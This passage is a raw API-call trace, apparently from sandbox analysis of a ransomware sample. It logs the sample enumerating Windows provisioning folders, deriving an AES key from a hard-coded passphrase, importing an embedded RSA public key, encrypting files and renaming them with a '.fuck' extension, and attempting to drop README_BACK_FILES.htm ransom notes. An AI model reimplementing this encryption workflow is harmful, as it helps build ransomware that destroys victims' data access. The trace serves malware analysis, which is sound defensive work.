lpOverlapped=0x0) returned 0 [0239.941] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.941] CryptEncrypt (in: hKey=0x28be858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.941] CloseHandle (hObject=0xffffffff) returned 1 [0239.941] CloseHandle (hObject=0xffffffff) returned 1 [0239.941] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0239.942] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0239.942] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0239.943] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0239.943] CryptDestroyHash (hHash=0x28be998) returned 1 [0239.943] CryptDestroyKey (hKey=0x28be858) returned 1 [0239.943] CryptReleaseContext (hProv=0x28d6878, dwFlags=0x0) returned 1 [0239.943] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.943] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0239.944] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0239.944] AreFileApisANSI () returned 1 [0239.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0239.944] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.944] GetLastError () returned 0x5 [0239.944] GetLastError () returned 0x5 [0239.944] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.944] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.945] GetLastError () returned 0x5 [0239.945] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml")) returned 0x20 [0239.945] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0239.946] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.946] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.947] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.947] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0239.950] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.950] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.950] CryptHashData (hHash=0x28bf218, pbData=0x2856ef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.950] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28be358) returned 1 [0239.950] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.950] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.950] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5f70) returned 1 [0239.950] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5f70, dwCertEncodingType=0x1, pInfo=0x28c8f18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8f48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8f50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be418) returned 1 [0239.950] CryptEncrypt (in: hKey=0x28be418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.951] CryptEncrypt (in: hKey=0x28be418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5cc8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5cc8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.951] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5cc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.951] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.951] CryptEncrypt (in: hKey=0x28be358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.951] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.951] CloseHandle (hObject=0xffffffff) returned 1 [0239.951] CloseHandle (hObject=0xffffffff) returned 1 [0239.951] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0239.951] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0239.952] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg")) returned 0 [0239.952] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.fuck")) returned 0 [0239.953] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.953] CryptDestroyKey (hKey=0x28be358) returned 1 [0239.953] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.953] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.953] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.953] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\readme_back_files.htm")) returned 0xffffffff [0239.953] AreFileApisANSI () returned 1 [0239.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0239.953] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.954] GetLastError () returned 0x5 [0239.954] GetLastError () returned 0x5 [0239.954] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.954] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.954] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\readme_back_files.htm")) returned 0xffffffff [0239.954] AreFileApisANSI () returned 1 [0239.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0239.954] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.955] GetLastError () returned 0x5 [0239.955] GetLastError () returned 0x5 [0239.955] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.955] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf018 [0239.955] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.955] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.955] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.955] GetLastError () returned 0x5 [0239.955] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml")) returned 0x20 [0239.956] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0239.956] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.956] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.957] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.957] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.959] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.959] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.960] CryptHashData (hHash=0x28bf218, pbData=0x28571c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.960] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be818) returned 1 [0239.960] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.960] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.960] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d63b0) returned 1 [0239.960] CryptImportPublicKeyInfo (in: hCryptProv=0x28d63b0, dwCertEncodingType=0x1, pInfo=0x28ca508*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca538*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca540*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be918) returned 1 [0239.960] CryptEncrypt (in: hKey=0x28be918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.960] CryptEncrypt (in: hKey=0x28be918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6878*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6878*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.960] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6878, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.961] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.961] CryptEncrypt (in: hKey=0x28be818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.961] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.961] CloseHandle (hObject=0xffffffff) returned 1 [0239.961] CloseHandle (hObject=0xffffffff) returned 1 [0239.961] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), bFailIfExists=0) returned 0 [0239.961] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0239.962] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg")) returned 0 [0239.962] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.fuck")) returned 0 [0239.963] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.963] CryptDestroyKey (hKey=0x28be818) returned 1 [0239.963] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.963] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.963] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.963] GetLastError () returned 0x5 [0239.963] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml")) returned 0x20 [0239.963] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0239.963] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.965] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.965] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.965] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.968] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.968] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.968] CryptHashData (hHash=0x28bf218, pbData=0x2857538, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.968] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be358) returned 1 [0239.968] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.968] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.968] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d6438) returned 1 [0239.968] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6438, dwCertEncodingType=0x1, pInfo=0x28caf98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cafc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cafd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be458) returned 1 [0239.969] CryptEncrypt (in: hKey=0x28be458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: 